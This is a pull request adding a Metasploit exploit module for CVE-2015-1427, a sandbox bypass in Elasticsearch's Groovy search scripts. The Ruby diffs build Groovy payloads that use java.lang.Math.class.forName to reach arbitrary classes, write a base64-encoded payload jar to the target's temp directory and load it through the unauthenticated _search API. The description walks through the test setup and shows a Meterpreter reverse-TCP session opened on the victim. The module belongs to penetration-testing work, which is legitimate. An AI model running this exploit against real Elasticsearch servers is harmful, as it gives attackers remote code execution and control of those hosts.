### PR TITLE
Add module for CVE-2015-1427, elasticsearch groovy code injection

### DIFF
--- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb
+++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb
@@ -100,22 +100,21 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def vulnerable?
-    addend_one = rand_text_numeric(rand(3) + 1).to_i
-    addend_two = rand_text_numeric(rand(3) + 1).to_i
-    sum = addend_one + addend_two
+    java = 'System.getProperty("java.class.path")'
 
-    java = java_sum([addend_one, addend_two])
-
-    vprint_status("#{peer} attempting to execute '#{java}' in Java")
+    vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...")
     res = execute(java)
     result = parse_result(res)
 
     if result.nil?
-      vprint_status("#{peer} no response to executed Java")
+      vprint_status("#{peer} - No results for the Java test")
       return false
+    elsif result =~ /elasticsearch/
+      vprint_status("#{peer} - Answer to Java test: #{result}")
+      return true
     else
-      vprint_status("#{peer} response to executed Java: #{result}")
-      result.to_i == sum
+      vprint_status("#{peer} - Answer to Java test: #{result}")
+      return false
     end
   end
 
@@ -143,10 +142,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     result.is_a?(::Array) ? result.first : result
-  end
-
-  def java_sum(summands)
-    summands.join(' + ')
   end
 
   def to_java_byte_array(str)

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -8,8 +8,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_JAVA,
       'Targets'        =>
         [
-          [ 'ElasticSearch 1.4.2', { } ]
+          ['ElasticSearch 1.4.2', {}]
         ],
       'DisclosureDate' => 'Dec 09 2013',
       'DefaultTarget' => 0))
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           Opt::RPORT(9200),
           OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]),
-          OptString.new('WritableDir', [true, 'A directory where we can write files (only for *nix environments)', '/tmp'])
+          OptString.new('WritableDir', [false, 'A directory where we can write files (Default: autodetection)'])
         ], self.class)
   end
 
@@ -69,33 +69,23 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
     end
 
-    print_status("#{peer} - Discovering remote OS...")
-    res = execute(java_os)
-    result = parse_result(res)
-    if result.nil?
-      fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
+    if datastore['WritableDir']
+      tmp_dir = datastore['WritableDir']
     else
-      # TODO: It'd be nice to report_host() with this info.
-      print_good("#{peer} - Remote OS is '#{result}'")
-    end
-
-    jar_file = ""
-    if result =~ /win/i
-      print_status("#{peer} - Discovering TEMP path")
+      print_status("#{peer} - Discovering TEMP path...")
       res = execute(java_tmp_dir)
-      result = parse_result(res)
-      if result.nil?
+      tmp_dir = parse_result(res)
+      if tmp_dir.nil?
         fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
-      else
-        print_good("#{peer} - TEMP path identified: '#{result}'")
       end
-      jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
-    else
-      jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
     end
 
-    register_file_for_cleanup(jar_file)
-    execute(java_payload(jar_file))
+    tmp_file = File.join(tmp_dir, rand_text_alpha(4 + rand(4)))
+    register_files_for_cleanup("#{tmp_file}")
+
+    print_status("#{peer} - Trying to load metasploit payload...")
+    java = java_load_class(tmp_file)
+    execute(java)
   end
 
   def vulnerable?
@@ -141,53 +131,30 @@ class Metasploit3 < Msf::Exploit::Remote
     result.is_a?(::Array) ? result.first : result
   end
 
-  def java_sum(summands)
-    summands.join(' + ')
-  end
-
-  def to_java_byte_array(str)
-    buff = "byte[] buf = new byte[#{str.length}];\n"
-    i = 0
-    str.unpack('C*').each do |c|
-      buff << "buf[#{i}] = #{c};\n"
-      i = i + 1
-    end
-
-    buff
-  end
-
-  def java_os
-    "System.getProperty(\"os.name\")"
-  end
-
   def java_tmp_dir
-    "System.getProperty(\"java.io.tmpdir\");"
+    'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
   end
 
+  def java_load_class(tmp_file)
+    java = [
+      "c=java.lang.Math.class.forName(\"java.io.FileOutputStream\");",
+      "b64=java.lang.Math.class.forName(\"sun.misc.BASE64Decoder\");",
+      "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
+      "b64_i=b64.newInstance();",
+      "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
+      "loader_class=java.lang.Math.class.forName(\"java.net.URLClassLoader\");",
+      "file_class=java.lang.Math.class.forName(\"java.io.File\");",
+      "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
+      "loader=loader_class.newInstance();",
+      "loader.addURL(file_url);",
+      "m=loader.loadClass('metasploit.Payload');",
+      "m.main(null);"
+    ]
 
-  def java_payload(file_name)
-    source = <<-EOF
-import java.io.*;
-import java.lang.*;
-import java.net.*;
-
-#{to_java_byte_array(payload.encoded_jar.pack)}
-File f = new File('#{file_name.gsub(/\\/, "/")}');
-FileOutputStream fs = new FileOutputStream(f);
-bs = new BufferedOutputStream(fs);
-bs.write(buf);
-bs.close();
-bs = null;
-URL u = f.toURI().toURL();
-URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
-Class c = cl.loadClass('metasploit.Payload');
-c.main(null);
-    EOF
-
-    source
+    java.join
   end
 
-  def execute(java)
+  def execute(java, timeout = 20)
     payload = {
       "size" => 1,
       "query" => {
@@ -208,9 +175,9 @@ c.main(null);
       'uri'    => normalize_uri(target_uri.path.to_s, "_search"),
       'method' => 'POST',
       'data'   => JSON.generate(payload)
-    })
+    }, timeout)
 
-    return res
+    res
   end
 
 end

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -48,8 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           Opt::RPORT(9200),
-          OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]),
-          OptString.new('WritableDir', [false, 'A directory where we can write files (Default: autodetection)'])
+          OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
         ], self.class)
   end
 
@@ -64,27 +63,39 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{peer} - Trying to execute arbitrary Java...")
+    print_status("#{peer} - Checking vulnerability...")
     unless vulnerable?
       fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
     end
 
-    if datastore['WritableDir']
-      tmp_dir = datastore['WritableDir']
+    print_status("#{peer} - Discovering TEMP path...")
+    res = execute(java_tmp_dir)
+    tmp_dir = parse_result(res)
+    if tmp_dir.nil?
+      fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
     else
-      print_status("#{peer} - Discovering TEMP path...")
-      res = execute(java_tmp_dir)
-      tmp_dir = parse_result(res)
-      if tmp_dir.nil?
-        fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
-      end
+      print_good("#{peer} - TEMP path on '#{tmp_dir}'")
     end
 
-    tmp_file = File.join(tmp_dir, rand_text_alpha(4 + rand(4)))
-    register_files_for_cleanup("#{tmp_file}")
+    print_status("#{peer} - Discovering remote OS...")
+    res = execute(java_os)
+    os = parse_result(res)
+    if os.nil?
+      fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
+    else
+      print_good("#{peer} - Remote OS is '#{os}'")
+    end
+
+    if os =~ /win/i
+      tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
+    else
+      tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
+    end
+
+    register_files_for_cleanup(tmp_file)
 
     print_status("#{peer} - Trying to load metasploit payload...")
-    java = java_load_class(tmp_file)
+    java = java_load_class(os, tmp_file)
     execute(java)
   end
 
@@ -135,7 +146,15 @@ class Metasploit3 < Msf::Exploit::Remote
     'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
   end
 
-  def java_load_class(tmp_file)
+  def java_os
+    'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
+  end
+
+  def java_load_class(os, tmp_file)
+    if os =~ /win/i
+      tmp_file.gsub!(/\\/, '\\\\\\\\')
+    end
+
     java = [
       "c=java.lang.Math.class.forName(\"java.io.FileOutputStream\");",
       "b64=java.lang.Math.class.forName(\"sun.misc.BASE64Decoder\");",

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -13,18 +13,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
+      'Name'           => 'ElasticSearch Search Groovy Sandbox Bypass',
       'Description'    => %q{
         This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
-        exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
-        REST API, which does not require authentication, where the search
-        function allows dynamic scripts execution. It can be used for remote attackers
-        to execute arbitrary Java code. This module has been tested successfully on
-        ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
+        exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
+        REST API, which does not require authentication, where the search function allows
+        groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
+        to reference arbitrary classes. It can be used to execute arbitrary Java code. This
+        module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
       },
       'Author'         =>
         [
-          'Unknown', # Vulnerability discoery and PoC # Jingdong from Lupin security team Lupin according to Google Translate, sorry :\
+          # Discovered by Jingdong from Lupin security team according to Google Translate, sorry if it's wrong :\
+          'Unknown', # Vulnerability discoery and PoC
           'Darren Martyn', # Public Exploit
           'juan vazquez'   # Metasploit module
         ],

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -156,18 +156,18 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     java = [
-      "c=java.lang.Math.class.forName(\"java.io.FileOutputStream\");",
-      "b64=java.lang.Math.class.forName(\"sun.misc.BASE64Decoder\");",
+      'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
+      'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
       "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
-      "b64_i=b64.newInstance();",
+      'b64_i=b64.newInstance();',
       "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
-      "loader_class=java.lang.Math.class.forName(\"java.net.URLClassLoader\");",
-      "file_class=java.lang.Math.class.forName(\"java.io.File\");",
+      'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
+      'file_class=java.lang.Math.class.forName("java.io.File");',
       "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
-      "loader=loader_class.newInstance();",
-      "loader.addURL(file_url);",
-      "m=loader.loadClass('metasploit.Payload');",
-      "m.main(null);"
+      'loader=loader_class.newInstance();',
+      'loader.addURL(file_url);',
+      'm=loader.loadClass(\'metasploit.Payload\');',
+      'm.main(null);'
     ]
 
     java.join

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -24,8 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          # Discovered by Jingdong from Lupin security team according to Google Translate, sorry if it's wrong :\
-          'Unknown', # Vulnerability discoery and PoC
+          'Cameron Morris', # Vulnerability discovery
           'Darren Martyn', # Public Exploit
           'juan vazquez'   # Metasploit module
         ],
@@ -43,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['ElasticSearch 1.4.2', {}]
         ],
-      'DisclosureDate' => 'Dec 09 2013',
+      'DisclosureDate' => 'Feb 11 2015',
       'DefaultTarget' => 0))
 
       register_options(

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -1,0 +1,219 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
+        exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
+        REST API, which does not require authentication, where the search
+        function allows dynamic scripts execution. It can be used for remote attackers
+        to execute arbitrary Java code. This module has been tested successfully on
+        ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discoery and PoC # Jingdong from Lupin security team Lupin according to Google Translate, sorry :\
+          'Darren Martyn', # Public Exploit
+          'juan vazquez'   # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2015-1427'],
+          ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
+          ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
+          ['URL', 'http://drops.wooyun.org/papers/5107']
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'ElasticSearch 1.4.2', { } ]
+        ],
+      'DisclosureDate' => 'Dec 09 2013',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(9200),
+          OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]),
+          OptString.new('WritableDir', [true, 'A directory where we can write files (only for *nix environments)', '/tmp'])
+        ], self.class)
+  end
+
+  def check
+    result = Exploit::CheckCode::Safe
+
+    if vulnerable?
+      result = Exploit::CheckCode::Vulnerable
+    end
+
+    result
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to execute arbitrary Java...")
+    unless vulnerable?
+      fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
+    end
+
+    print_status("#{peer} - Discovering remote OS...")
+    res = execute(java_os)
+    result = parse_result(res)
+    if result.nil?
+      fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
+    else
+      # TODO: It'd be nice to report_host() with this info.
+      print_good("#{peer} - Remote OS is '#{result}'")
+    end
+
+    jar_file = ""
+    if result =~ /win/i
+      print_status("#{peer} - Discovering TEMP path")
+      res = execute(java_tmp_dir)
+      result = parse_result(res)
+      if result.nil?
+        fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
+      else
+        print_good("#{peer} - TEMP path identified: '#{result}'")
+      end
+      jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
+    else
+      jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
+    end
+
+    register_file_for_cleanup(jar_file)
+    execute(java_payload(jar_file))
+  end
+
+  def vulnerable?
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+
+    java = java_sum([addend_one, addend_two])
+
+    vprint_status("#{peer} attempting to execute '#{java}' in Java")
+    res = execute(java)
+    result = parse_result(res)
+
+    if result.nil?
+      vprint_status("#{peer} no response to executed Java")
+      return false
+    else
+      vprint_status("#{peer} response to executed Java: #{result}")
+      result.to_i == sum
+    end
+  end
+
+  def parse_result(res)
+    unless res
+      vprint_error("#{peer} no response")
+      return nil
+    end
+
+    unless res.code == 200 && res.body
+      vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
+      return nil
+    end
+
+    begin
+      json = JSON.parse(res.body.to_s)
+    rescue JSON::ParserError
+      return nil
+    end
+
+    begin
+      result = json['hits']['hits'][0]['fields']['msf_result']
+    rescue
+      return nil
+    end
+
+    result.is_a?(::Array) ? result.first : result
+  end
+
+  def java_sum(summands)
+    summands.join(' + ')
+  end
+
+  def to_java_byte_array(str)
+    buff = "byte[] buf = new byte[#{str.length}];\n"
+    i = 0
+    str.unpack('C*').each do |c|
+      buff << "buf[#{i}] = #{c};\n"
+      i = i + 1
+    end
+
+    buff
+  end
+
+  def java_os
+    "System.getProperty(\"os.name\")"
+  end
+
+  def java_tmp_dir
+    "System.getProperty(\"java.io.tmpdir\");"
+  end
+
+
+  def java_payload(file_name)
+    source = <<-EOF
+import java.io.*;
+import java.lang.*;
+import java.net.*;
+
+#{to_java_byte_array(payload.encoded_jar.pack)}
+File f = new File('#{file_name.gsub(/\\/, "/")}');
+FileOutputStream fs = new FileOutputStream(f);
+bs = new BufferedOutputStream(fs);
+bs.write(buf);
+bs.close();
+bs = null;
+URL u = f.toURI().toURL();
+URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
+Class c = cl.loadClass('metasploit.Payload');
+c.main(null);
+    EOF
+
+    source
+  end
+
+  def execute(java)
+    payload = {
+      "size" => 1,
+      "query" => {
+        "filtered" => {
+          "query" => {
+            "match_all" => {}
+          }
+        }
+      },
+      "script_fields" => {
+        "msf_result" => {
+          "script" => java
+        }
+      }
+    }
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path.to_s, "_search"),
+      'method' => 'POST',
+      'data'   => JSON.generate(payload)
+    })
+
+    return res
+  end
+
+end

--- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb
@@ -99,33 +99,30 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def vulnerable?
-    addend_one = rand_text_numeric(rand(3) + 1).to_i
-    addend_two = rand_text_numeric(rand(3) + 1).to_i
-    sum = addend_one + addend_two
+    java = 'java.lang.Math.class.forName("java.lang.Runtime")'
 
-    java = java_sum([addend_one, addend_two])
-
-    vprint_status("#{peer} attempting to execute '#{java}' in Java")
+    vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
     res = execute(java)
     result = parse_result(res)
 
     if result.nil?
-      vprint_status("#{peer} no response to executed Java")
+      vprint_status("#{peer} - no response to test")
       return false
-    else
-      vprint_status("#{peer} response to executed Java: #{result}")
-      result.to_i == sum
+    elsif result == 'class java.lang.Runtime'
+      return true
     end
+
+    false
   end
 
   def parse_result(res)
     unless res
-      vprint_error("#{peer} no response")
+      vprint_error("#{peer} - No response")
       return nil
     end
 
     unless res.code == 200 && res.body
-      vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
+      vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
       return nil
     end
 


### PR DESCRIPTION
This module adds a msf module for CVE-2015-1427, a RCE in elasticsearch due to the groovy sandbox bypass discovered recently. Also improves the old script_mvel_rce check to avoid false positives.

This module has been tested with Elastic 1.4.2 on Ubuntu 12.04 server (32 bits) and Windows.
## Verification
- [x] Install Ubuntu 12.04 server (32 bits)
- [x] Install openjdk jdk 7: `sudo apt-get install openjdk-7-jdk`
- [x] Install Elastic search 1.4.2, it can be donwloaded from its homepage.
- [x] Execute elasticsearch `bin\elasticsearch'
- [x] Create one index

```
juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
{"acknowledged":true}juan@ubuntu:~$ 
```
- [x] Add at least one document to the index

```
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
{"_index":"twitter","_type":"tweet","_id":"1","_version":1,"created":true}juan@ubuntu:~$
```
- [x] Run the module, hopefully enjoy sessions

```
msf > use exploit/multi/elasticsearch/search_groovy_script
msf exploit(search_groovy_script) > set RHOST 172.16.158.131
RHOST => 172.16.158.131
msf exploit(search_groovy_script) > check
[+] 172.16.158.131:9200 - The target is vulnerable.
msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(search_groovy_script) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(search_groovy_script) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:9200 - Checking vulnerability...
[*] 172.16.158.131:9200 - Discovering TEMP path...
[+] 172.16.158.131:9200 - TEMP path on '/tmp'
[*] 172.16.158.131:9200 - Discovering remote OS...
[+] 172.16.158.131:9200 - Remote OS is 'Linux'
[*] 172.16.158.131:9200 - Trying to load metasploit payload...
[*] Sending stage (30680 bytes) to 172.16.158.131
[+] Deleted /tmp/EmGWzsL.jar

meterpreter > getuid
sServer username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter >
```
